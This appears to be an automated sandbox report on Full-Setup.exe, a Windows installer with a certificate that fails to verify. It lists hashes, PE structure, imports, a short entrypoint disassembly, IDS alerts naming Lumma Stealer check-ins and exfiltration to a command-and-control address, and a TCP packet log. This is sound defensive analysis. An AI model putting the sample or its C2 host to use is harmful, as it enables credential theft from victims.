SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rf1nfvwi.fnz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.962251476679135
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Full-Setup.exe
File size:	1'286'284 bytes
MD5:	8f260f06588b4b171caa42f66929d9a6
SHA1:	c3632bec197bf268b7ee2cd7a709691f8a35a61a
SHA256:	a8d6e59a8f43bdcfad4de075ebc483aeda53c0ebbc59332d84663591adaeaa03
SHA512:	31790a1e227d5cb2af08d67c4325e0a1df81d1e16d15a1793563d6e7a64a058cdeb8055152a9aa7fccbc4324e42285a0e784b00a95ace280ca2e88e1a5890a17
SSDEEP:	24576:brzzh68Q0RsYk+6txVVC9U0MPGZAwF1yJgl0Or7OIDwMPEg9dcMWgGx0C2K2:/zz9sYkhHIU0M+ZAwFiwrVwM7Mxp2K2
TLSH:	D655239B8F7A64A6C0A16F7237B0DB574D775D08AF119A3AA711F1CB72663C20081B37
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

File Icon


Icon Hash:	9070f8d8d0e47080

Static PE Info

General

Entrypoint:	0x4038af
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=VeriSign Class 3 Code Signing 2009-2 CA, OU=Terms of use at https://www.verisign.com/rpa (c)09, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	01/07/2010 20:00:00 02/07/2011 19:59:59
Subject Chain	CN=USBlyzer, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=USBlyzer, L=St. Petersburg, S=St. Petersburg, C=RU
Version:	3
Thumbprint MD5:	75297C190C025C7A82B15677D333560E
Thumbprint SHA-1:	86E18A81B94E1011C5D3E1E60789AAACCF36704A
Thumbprint SHA-256:	1E9B8DE53D2F7273D2C9CBBF7AA2382E1A6C2141774B5C41FFE26E60A0F07CC9
Serial:	62FCC26A7F4A434259B8883B05A42C28

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007FE8BCED7CEBh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007FE8BCED79CDh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007FE8BCED79BBh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007FE8BCED52BAh
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007FE8BCED7691h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FE8BCED5343h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FE8BCED52BAh
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xac40	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x100000	0x381da	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x138644	0x1a48
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0x994	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x728c	0x7400	419d4e1be1ac35a5db9c47f553b27cea	False	0.6566540948275862	data	6.499708590628113	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x2b6e	0x2c00	cca1ca3fbf99570f6de9b43ce767f368	False	0.3678977272727273	data	4.497932535153822	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x72b9c	0x200	77f0839f8ebea31040e462523e1c770e	False	0.279296875	data	1.8049406284608531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x7f000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x100000	0x381da	0x38200	fb14727ebfec93144506225654520e85	False	0.9375695991091314	data	7.759085572070425	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x139000	0xfd6	0x1000	ba3b223c1ed5500e95c7b8ebb85a48e8	False	0.5947265625	data	5.580122163212792	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x100280	0x2d7cf	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced	English	United States	0.9783328592360414
RT_ICON	0x12da50	0x4db6	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	0.998039609932643
RT_ICON	0x132808	0x182a	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0017782088587133
RT_ICON	0x134034	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.3729658258746949
RT_ICON	0x13669c	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.427367941712204
RT_ICON	0x1377c4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.526595744680851
RT_DIALOG	0x137c2c	0x100	data	English	United States	0.5234375
RT_DIALOG	0x137d2c	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x137e48	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x137ea8	0x5a	data	English	United States	0.7888888888888889
RT_MANIFEST	0x137f04	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-21T13:02:07.212650+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.43.127	443	TCP
2024-12-21T13:02:08.245697+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49738	104.21.43.127	443	TCP
2024-12-21T13:02:08.245697+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49738	104.21.43.127	443	TCP
2024-12-21T13:02:09.519860+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.43.127	443	TCP
2024-12-21T13:02:10.293340+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49739	104.21.43.127	443	TCP
2024-12-21T13:02:10.293340+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49739	104.21.43.127	443	TCP
2024-12-21T13:02:11.827348+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.43.127	443	TCP
2024-12-21T13:02:14.357082+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.43.127	443	TCP
2024-12-21T13:02:16.534303+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.43.127	443	TCP
2024-12-21T13:02:19.211420+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49750	104.21.43.127	443	TCP
2024-12-21T13:02:19.966107+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49750	104.21.43.127	443	TCP
2024-12-21T13:02:21.642694+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49756	104.21.43.127	443	TCP
2024-12-21T13:02:25.113484+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49767	104.21.43.127	443	TCP
2024-12-21T13:02:25.896219+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49767	104.21.43.127	443	TCP
2024-12-21T13:02:27.255557+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49773	104.26.3.16	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 13:02:05.980190992 CET	49738	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:05.980225086 CET	443	49738	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:05.980370998 CET	49738	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:05.983752966 CET	49738	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:05.983772039 CET	443	49738	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:07.212398052 CET	443	49738	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:07.212650061 CET	49738	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:07.221096039 CET	49738	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:07.221121073 CET	443	49738	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:07.221402884 CET	443	49738	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:07.269583941 CET	49738	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:07.272531986 CET	49738	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:07.272531986 CET	49738	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:07.272713900 CET	443	49738	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:08.245744944 CET	443	49738	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:08.245975971 CET	443	49738	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:08.246037960 CET	49738	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:08.247636080 CET	49738	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:08.247651100 CET	443	49738	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:08.247679949 CET	49738	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:08.247685909 CET	443	49738	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:08.303241014 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:08.303271055 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:08.303354979 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:08.303611040 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:08.303626060 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:09.519782066 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:09.519860029 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:09.521672010 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:09.521681070 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:09.522072077 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:09.523669958 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:09.523706913 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:09.523782969 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.293431044 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.293565035 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.293658018 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.293740988 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.293755054 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.293807030 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.293836117 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.298248053 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.298305035 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.298314095 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.306596994 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.306654930 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.306663036 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.347805023 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.347815990 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.394720078 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.412899017 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.457180023 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.457195997 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.487152100 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.487257957 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.487338066 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.487365007 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.487462044 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.487469912 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.487582922 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.487646103 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.487679005 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.487694025 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.487694025 CET	49739	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.487701893 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.487709045 CET	443	49739	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.606796026 CET	49740	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.606904030 CET	443	49740	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:10.608311892 CET	49740	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.608684063 CET	49740	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:10.608722925 CET	443	49740	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:11.827227116 CET	443	49740	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:11.827347994 CET	49740	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:11.828747988 CET	49740	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:11.828787088 CET	443	49740	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:11.829134941 CET	443	49740	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:11.830569029 CET	49740	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:11.830740929 CET	49740	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:11.830789089 CET	443	49740	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:11.830889940 CET	49740	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:11.830904961 CET	443	49740	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:13.039833069 CET	443	49740	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:13.039971113 CET	443	49740	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:13.040030003 CET	49740	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:13.040153980 CET	49740	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:13.040179968 CET	443	49740	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:13.135977030 CET	49741	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:13.136090040 CET	443	49741	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:13.136202097 CET	49741	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:13.136564970 CET	49741	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:13.136594057 CET	443	49741	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:14.356892109 CET	443	49741	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:14.357081890 CET	49741	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:14.358531952 CET	49741	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:14.358541965 CET	443	49741	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:14.358884096 CET	443	49741	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:14.360482931 CET	49741	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:14.360627890 CET	49741	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:14.360627890 CET	49741	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:14.360652924 CET	443	49741	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:15.140847921 CET	443	49741	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:15.141118050 CET	443	49741	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:15.141192913 CET	49741	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:15.141360998 CET	49741	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:15.141390085 CET	443	49741	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:15.315471888 CET	49743	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:15.315511942 CET	443	49743	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:15.315602064 CET	49743	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:15.315974951 CET	49743	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:15.315984964 CET	443	49743	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:16.534193039 CET	443	49743	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:16.534302950 CET	49743	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:16.535765886 CET	49743	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:16.535810947 CET	443	49743	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:16.536720991 CET	443	49743	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:16.538707018 CET	49743	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:16.538985014 CET	49743	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:16.539017916 CET	443	49743	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:16.539088964 CET	49743	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:16.539098978 CET	443	49743	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:17.472326040 CET	443	49743	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:17.472592115 CET	443	49743	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:17.473082066 CET	49743	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:17.473181963 CET	49743	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:17.473212957 CET	443	49743	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:17.622023106 CET	49750	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:17.622066021 CET	443	49750	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:17.622145891 CET	49750	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:17.622503042 CET	49750	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:17.622514009 CET	443	49750	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:19.211298943 CET	443	49750	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:19.211420059 CET	49750	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:19.213056087 CET	49750	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:19.213083029 CET	443	49750	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:19.213376045 CET	443	49750	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:19.214646101 CET	49750	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:19.214745998 CET	49750	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:19.214752913 CET	443	49750	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:19.966113091 CET	443	49750	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:19.966207981 CET	443	49750	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:19.966312885 CET	49750	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:19.966582060 CET	49750	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:19.966593981 CET	443	49750	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:20.406018972 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:20.406054020 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:20.406147957 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:20.406512976 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:20.406524897 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:21.642606974 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:21.642693996 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.644279003 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.644294024 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:21.644619942 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:21.646094084 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.646990061 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.647027969 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:21.647146940 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.647180080 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:21.647306919 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.647346020 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:21.647480965 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.647521973 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:21.647672892 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.647710085 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:21.647874117 CET	49756	443	192.168.2.4	104.21.43.127
Dec 21, 2024 13:02:21.647911072 CET	443	49756	104.21.43.127	192.168.2.4
Dec 21, 2024 13:02:21.647922993 CET	49756	443	192.168.2.4	104.21.43.127
